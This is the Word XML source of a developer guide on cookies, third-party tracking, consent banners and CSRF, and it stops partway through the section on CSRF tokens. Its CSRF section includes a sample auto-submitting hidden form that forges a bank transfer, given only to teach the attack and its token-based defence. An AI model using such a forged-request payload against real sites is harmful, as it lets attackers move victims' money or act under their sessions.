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20" w:before="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Security &amp; Cookies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">A Complete Developer Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="800" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookies • Tracking • CSRF • Session Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="10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1. What Are Cookies?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookies are small text files (key-value data) that a website stores in your browser. When you revisit the site, the browser sends those cookies back to the server automatically. The 'Accept Cookies' banner and storing a session token in a cookie use the exact same underlying browser API — the difference is what is being stored and why.</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1.1 Types of Cookies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Session / Auth</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Keep user logged in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session_id=abc123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Tracking / Analytics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behavior across sites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_ga=GA1.2.1234567890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Preference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Remember language, theme, timezone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lang=en-US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Essential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 CSRF tokens, load balancing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csrf_token=k9fP2m...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Cookie Anatomy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every cookie can carry security flags that control how browsers handle it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Cookie: session_id=abc123; HttpOnly; Secure; SameSite=Strict; Path=/; Expires=Wed, 13 May 2026 00:00:00 GMT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HttpOnly</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Prevents JavaScript (document.cookie) from reading it — XSS protection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transmitted over HTTPS — prevents interception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SameSite=Strict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 sent on cross-site requests — CSRF protection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subdomains can see the cookie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Expires / Max-Age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Session cookie (tab close) vs persistent cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Cookies vs LocalStorage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Cookies</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LocalStorage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Sent with requests?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automatically</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 you do it manually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 accessible?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without HttpOnly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Expiry control</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 persists until cleared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 limit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~4KB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~5-10MB</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 for</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 sessions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UI state, non-sensitive prefs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="10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2. How Auth Cookies Work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The password is never stored in the cookie — only an opaque token that maps to a server-side session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step Login Flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User submits login credentials (username + password)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server validates credentials against the database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server creates a session record in DB, generates a unique session ID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server responds with: Set-Cookie: session_id=xyz; HttpOnly; Secure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browser stores the cookie, sends it automatically on every subsequent request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server looks up the session ID and knows who the user is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="10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3. Third-Party Tracking Cookies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When you 'Accept Cookies' on a banner, you are primarily consenting to third-party tracking cookies — not the auth tokens that keep you logged in. These are set by external companies like Meta and Google whose scripts are embedded across millions of websites.</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3.1 How Tracking Works End-to-End</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1 — You visit shop.com and browse shoes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Your browser loads shop.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">shop.com's HTML includes a Meta Pixel script from facebook.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">That script runs — your browser contacts Meta's servers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Meta sets a cookie: _fbp=abc999 with Domain=.facebook.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Meta records: Browser ID abc999 visited shop.com, looked at Nike shoes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2 — You visit news-site.com the next day</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">news-site.com also has Meta Pixel embedded (millions of sites do)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Your browser loads Meta's script again — contacts facebook.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browser automatically sends the existing cookie: _fbp=abc999</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Meta now knows the same person visited both shop.com and news-site.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3 — You see a targeted Nike ad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">news-site.com runs a real-time ad auction (~100ms while page loads)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Meta matches your cookie ID to your profile: shoes, tech, sports interests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nike's campaign targets 'people who viewed our products'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nike wins the auction — you see a Nike shoe ad</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3.2 The Key Mechanic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The cookie is NOT from shop.com. It lives under facebook.com. When news-site.com loads Meta's script, your browser contacts facebook.com and sends that cookie automatically. Meta is the common thread — not the sites themselves.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shop.com visit</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news-site.com visit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Script loaded from</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facebook.com</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facebook.com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Cookie sent to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facebook.com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facebook.com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Cookie value</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_fbp=abc999 (set here)</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_fbp=abc999 (recognized here)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 learns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browsed Nike shoes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user reads tech news</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Why Cookie Consent Banners Exist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GDPR (EU) and CCPA (California) require explicit consent before storing non-essential cookies. Essential cookies (auth, cart, security) are exempt. When you click 'Accept All,' you consent to third-party ad networks dropping tracking cookies in your browser. When you reject, those scripts are blocked and no tracking cookie is set.</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3.4 How Browsers Are Killing Third-Party Tracking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Browser</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Safari (ITP)</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Blocks third-party cookies entirely since 2023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Firefox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Blocks third-party cookies by default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Chrome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Delayed blocking — still in progress (their ad business depends on it)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="10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4. CSRF — Cross-Site Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF is an attack where a malicious website tricks your browser into making an authenticated request to another site without your knowledge.</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4.1 The Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You are logged into your-bank.com. Your session cookie sits in the browser. You then visit evil.com, which has this hidden in its HTML:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;form action="https://your-bank.com/transfer" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;input type="hidden" name="to_account" value="hacker123" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;input type="hidden" name="amount" value="10000" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;document.forms[0].submit();&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The browser fires a POST to your-bank.com and automatically attaches your session cookie. The bank sees a valid session and transfers the money. You never clicked anything.</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4.2 The Fix — CSRF Token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The server generates a random unpredictable token, stores it, and embeds it in every form. On submission, the server checks that the token matches.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Session Cookie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CSRF Token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Proves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Who you are</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That the request came from our own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 by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automatically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explicitly included in form/request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Attacker has access?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(browser sends it freely)</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 cannot read cross-origin HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 Why the Hacker Cannot Fake the Token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF token is generated fresh on every page load</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It is a cryptographically random string — cannot be guessed</w:t>
      </w:r>
